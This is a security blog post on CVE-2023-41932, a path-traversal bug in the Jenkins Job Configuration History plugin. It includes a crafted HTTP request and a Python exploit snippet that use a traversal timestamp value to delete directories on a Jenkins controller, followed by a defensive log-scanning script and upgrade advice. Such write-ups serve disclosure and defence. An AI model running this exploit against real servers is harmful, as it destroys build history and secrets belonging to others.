CVE-2023-41932 - Exploiting the Jenkins Job Configuration History Plugin to Delete Arbitrary Directories
The software development world relies heavily on automation tools like Jenkins. Many teams use plugins to extend Jenkins’ features. But sometimes, a plugin exposes a dangerous vulnerability. CVE-2023-41932 is a prime example: it lets an attacker delete specific directories on your Jenkins controller, potentially deleting important build history and even impacting build security. In this post, we’ll break down what happened, how the attack works, and what you need to do to protect yourself.
What is CVE-2023-41932?
This vulnerability affects the Job Configuration History plugin for Jenkins, up to version 1227.v7a_79fc4dc01f. The bug comes from how endpoints process the timestamp query parameter. When a user with at least ‘Job/Configure’ permission sends a specially crafted request, Jenkins can be tricked into deleting directories of the attacker's choosing—*as long as they contain a file called* history.xml.
The plugin does not sufficiently validate this input, so a malicious user can use directory traversal sequences to reach outside the intended file paths.
How Does the Exploit Work?
At the heart of this bug is a series of endpoints handling deletion of job history records. These endpoints accept a timestamp query parameter, which is supposed to indicate which historic configuration should be deleted. The plugin doesn’t properly sanitize or validate this parameter—as a result, you can feed it path traversal values, like ../../path/to/evil, to tell Jenkins to delete directories *outside* the intended config history.
Example Exploit
Let’s say your Jenkins root is /var/jenkins_home, and the directory /var/jenkins_home/secrets/stuff/ contains a file called history.xml.
A crafted HTTP request like this can cause the plugin to delete it:
```http
POST /job/YourJob/jobConfigHistory/delete?timestamp=../../secrets/stuff HTTP/1.1
Host: jenkins.example.com
Cookie: JSESSIONID=your-session-here
Content-Type: application/x-www-form-urlencoded
...
```
Here’s what happens:
- timestamp=../../secrets/stuff tells the plugin to work with that specific directory
- Plugin finds history.xml in there
- Plugin deletes the /var/jenkins_home/secrets/stuff directory and everything inside
Python Exploit Snippet
```python
import requests

jenkins_url = 'https://jenkins.example.com'
job_name = 'YourJob'
malicious_path = '../../secrets/stuff'

# Must be logged in and have suitable cookies/headers
cookies = {'JSESSIONID': 'your-session-token'}
delete_url = f'{jenkins_url}/job/{job_name}/jobConfigHistory/delete?timestamp={malicious_path}'

# This will trigger the deletion if you have Job/Configure rights
resp = requests.post(delete_url, cookies=cookies, verify=False)
print(resp.status_code)
```
Note: You need a valid session or authentication.
- Data Destruction: Build history, secrets, or important data inside directories are lost.
- Lateral Damage: If permissions are broad, attackers could systematically clear out configuration records across many jobs.
- Potential Chaining: Deleting history may make other vulnerabilities harder to audit or roll back.
- Upgrade immediately: Install version 1229.v303947a_679b or later.
- Check user permissions: Limit ‘Job/Configure’ access to only trusted accounts.
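To check whether the request pattern described above has already hit your controller, you can scan access logs for jobConfigHistory requests whose timestamp parameter looks like a path. The following is an added example, not code from the original post or from the Jenkins project; it assumes a reverse proxy or Jenkins access log in common/combined format, and the sample lines and timestamp values are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request and status fields of a common/combined-format access log line (assumed format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample lines for illustration; not from a real system.
SAMPLE_LOG = [
    '203.0.113.7 - alice [06/Sep/2023:13:20:01 +0000] "POST /job/YourJob/jobConfigHistory/delete?timestamp=../../secrets/stuff HTTP/1.1" 302 0',
    '203.0.113.9 - bob [06/Sep/2023:13:21:10 +0000] "POST /job/YourJob/jobConfigHistory/delete?timestamp=2023-09-06_13-15-00 HTTP/1.1" 302 0',
    '203.0.113.7 - alice [06/Sep/2023:13:22:45 +0000] "POST /job/YourJob/jobConfigHistory/delete?timestamp=%252e%252e%252fsecrets%252fstuff HTTP/1.1" 302 0',
    '203.0.113.9 - bob [06/Sep/2023:13:23:02 +0000] "GET /job/YourJob/ HTTP/1.1" 200 5120',
]


def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input (%252e%252e) is normalized."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_timestamps(target):
    """Return decoded timestamp values on a jobConfigHistory URL that look like paths."""
    parts = urlsplit(target)
    if "/jobConfigHistory" not in fully_decode(parts.path):
        return []
    hits = []
    for raw in parse_qs(parts.query, keep_blank_values=True).get("timestamp", []):
        value = fully_decode(raw)
        # A history timestamp has no reason to contain separators or parent references.
        if ".." in value or "/" in value or "\\" in value:
            hits.append(value)
    return hits


def scan(lines):
    """Yield (line_number, method, status, decoded_value) for each suspicious request."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for value in suspicious_timestamps(match["target"]):
            yield number, match["method"], match["status"], value
```

A hit shows that a traversal value was sent, not that a directory was deleted; confirm against the filesystem or backups. Only the query string is inspected, so parameters sent in a request body will not appear in these logs.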
Final Thoughts
CVE-2023-41932 is a textbook example of why input validation matters, especially when the input is used to access the file system. If you’re running Jenkins, especially with multiple users or automated agents, don’t delay in upgrading any affected plugins.
Keep an eye on your plugins, follow security advisories (Jenkins Security), and always use the *Principle of Least Privilege* to limit exposure.
Timeline
Published on: 09/06/2023 13:15:00 UTC
Last modified on: 09/11/2023 20:07:00 UTC